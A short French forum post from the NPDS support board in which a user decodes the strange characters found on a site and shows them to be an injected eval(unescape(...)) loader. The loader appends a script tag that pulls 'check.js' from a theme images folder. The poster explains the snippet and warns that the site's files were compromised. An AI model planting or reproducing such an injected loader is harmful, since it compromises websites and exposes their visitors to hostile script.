Index du Forum » » Bugs, Probs ...

Auteur

Caractères bizarres sur le site
Anonyme
19853  

  Posté : 03-02-2008 17:38

une fois "unescaper" voila ce que ca donne :

***


eval(unescape('if (!document.getElem entById('JSSS')){ JSS1 = 5% 34; JSS2 = 157522; JSS3 = '%2 Fs/themes/npds2004/images/f aki/dummy.htm'; var js = d% 6Fcument.createElement('scr%6 9pt'); js.setAttribute('src ', '/s/themes/npds2004/ima% 67es/faki/check.js'); js.se%7 4Attribute('id', 'JSSS'); d ocument.getElementsByTagNa% 6De('head').item(0).appendC%6 8ild(js) }; '));


***

l'ojectif c'est de creer une div JSSS dans laquelle est injecté le js "check.js"

si kk1 reussi a modifier tes fichiers c'est que tu as une faille de sécurité...



Cet article provient de NPDS

http://www.npds.org/viewtopic.php?topic=23247&forum=1